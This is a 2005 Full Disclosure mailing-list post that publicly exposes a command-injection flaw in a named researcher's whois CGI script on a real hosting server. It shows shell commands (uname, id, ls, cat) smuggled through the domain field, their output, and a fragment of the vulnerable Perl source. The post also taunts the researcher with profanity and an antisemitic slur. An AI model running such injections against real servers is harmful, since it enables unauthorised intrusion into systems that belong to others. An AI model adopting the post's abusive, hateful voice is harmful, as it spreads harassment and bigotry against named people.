Full Disclosure mailing list archives

Fernando Gont remote command execution and big mouth vulnerability

From: Joxean Koret <joxeankoret () gmail com>
Date: Wed, 3 Aug 2005 14:22:36 +0200

SHUT THE FUCK UP!!! AND FIX YOUR F%$CK1NG WEBSITE!!!  WE ARE ALL SICK
OF YOUR BORING E-MAILS!!!! MO/A%SDRF!CKER!


http://thor.prohosting.com/fgont/cgi-bin/whois.pl

whois for domain: uname -a

FreeBSD thor.prohosting.com 4.10-RELEASE-p3 FreeBSD 4.10-RELEASE-p3
#0: Fri Nov  5 10:49:09 MST 2004
jblack () thor prohosting com:/usr/obj/usr/src/sys/LOCAL  i386


and whois for domain: id


uid=59286(u0638237) gid=1000(user) groups=1000(user)


and for ls -la

  whois ls -la
total 124
dr-xr-xr-x  2 u0638237  2000    512 Dec 28  2003 .
drwxr-xr-x  6 u0638237  2000    512 Jul 21 04:35 ..
-rwxr-xr-x  1 u0638237  2000  15091 Jul 30  2003 cgi-lib.pl
-rwxr-xr-x  1 u0638237  2000    621 Jun 24  2003 cli.pl
-rwxr-xr-x  1 u0638237  2000    993 Jul 30  2003 dig.pl
-rwxr-xr-x  1 u0638237  2000   4388 Dec 28  2003 fuente.cgi
-r--r--r--  1 u0638237  2000    552 Jun 25  2003 p1.txt
-r--r--r--  1 u0638237  2000    549 Jul  7  2003 p1dig.txt
-r--r--r--  1 u0638237  2000    556 Jul  7  2003 p1host.txt
-r--r--r--  1 u0638237  2000    577 Jul  7  2003 p1ns.txt
-r-xr-xr-x  1 u0638237  2000    562 Dec 28  2003 p1whois.txt
-r--r--r--  1 u0638237  2000    192 Jun 25  2003 p2.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2dig.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2host.txt
-r--r--r--  1 u0638237  2000    192 Jul  7  2003 p2ns.txt
-rwxrwxrwx  1 u0638237  2000    192 Dec 27  2003 p2whois.txt
-rwxr-xr-x  1 u0638237  2000  10171 Dec 28  2003 whois.cgi
-rwxr-xr-x  1 u0638237  2000    842 Dec 28  2003 whois.pl


BREAKING NEWS... for registrants of domain cat whois.pl

  whois cat whois.pl
#!/usr/local/bin/perl

       require('cgi-lib.pl');
       &ReadParse;

       $p1="p1whois.txt";
       $p2="p2whois.txt";

       print "Content-type: text/html\r\n\r\n";
       $string = $in{'direccion'};

       $_ = $string;
       $string=~ s/\>//g;
.....

$cmd ----->> YOU FUCKING JEW!!!!!!!!!!!

  "; open(p2); while($linea=){ print "$linea"; } close(p2);


Turkey hunters, inc

 "knock, knock, Neo follow the white turkey!!"

"Fernando Gont" <fernando () frh utn edu ar>

Folks,

My posts to this list have tried to show how easy it is to perform ICMP
attacks against TCP.

The attacks are blind, so the attacker does not need to be a "man in the
middle" to perform then. The typical number of packets required to perform
any of these attacks is about 16000 (in many cases, the attacker requires
fewer packets). This means that even when a 128kbps link, it will take the
attacker much less than a minute to perform them.

.....

Fernando Gont
e-mail: fernando () gont com ar || fgont () acm org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 03)
- Re: Fernando Gont remote command execution and big mouth vulnerability Fernando Gont (Aug 04)
  - Re: Fernando Gont remote command execution and big mouth vulnerability Roman Medina-Heigl Hernandez (Aug 04)
    - Re: Fernando Gont remote command execution and big mouth vulnerability Fernando Gont (Aug 04)
  - Message not available
    - Re: Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 04)
  - Message not available
    - Re: Fernando Gont remote command execution and big mouth vulnerability Hugo Vazquez Carapez (Aug 05)
- <Possible follow-ups>
- Fernando Gont remote command execution and big mouth vulnerability Joxean Koret (Aug 03)